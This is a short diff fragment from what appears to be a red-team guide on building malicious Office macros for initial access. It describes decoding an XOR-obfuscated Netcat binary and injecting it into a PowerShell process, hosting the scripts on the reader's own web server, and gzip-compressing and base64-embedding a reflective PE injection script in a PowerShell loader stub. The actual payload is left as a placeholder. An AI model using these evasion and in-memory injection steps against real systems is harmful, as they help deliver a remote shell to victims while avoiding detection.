hassan0x/ReconHunter/InitialAccess/MacroDev.md

 Then use the PEInject.ps1 script and replace the URLs with your own web server.

+The PEInject.ps1 script will reverse what XORed Netcat does then inject Netcat into powershell process.

-# Compress
+# PEInject.ps1 Obfuscation

-Then compress using https://www.multiutil.com/text-to-gzip-compress/ and put the output into the below script.
+Then compress PEInject.ps1 script using https://www.multiutil.com/text-to-gzip-compress/ and put the output into the below script.

 ```
 $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('insert_gzip_compressed_Invoke-ReflectivePEInjection'));